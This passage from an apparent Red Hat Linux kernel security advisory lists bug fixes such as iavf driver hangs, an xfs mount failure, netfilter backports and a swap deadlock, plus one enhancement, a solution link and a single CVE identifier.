* [Intel 8.9] iavf: Driver Update (BZ#2232400)

* Important iavf bug fixes July 2023 (BZ#2232401)

* iavf: hang in iavf_remove() - SNO node hangs after running systemctl reboot (BZ#2232404)

* [RHEL 8.9] Proactively backport locking fixes from upstream (BZ#2235394)

* NAT sport clash in OCP causing 1 second TCP connection establishment delay. (BZ#2236515)

* xfs: mount fails when device file name is long (BZ#2236814)

* netfilter: RHEL 8.8 phase 2 backports from upstream (BZ#2236817)

* swap deadlock when attempt to charge a page to a cgroup stalls waiting on I/O plugged on another task in swap code (BZ#2237686)

Enhancement(s):

* [Intel 8.7 FEAT] TSC: Avoid clock watchdog when not needed (BZ#2216051)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-36558

References:

https://access.redhat.com/security/updates/classification/#important

Tag

#linux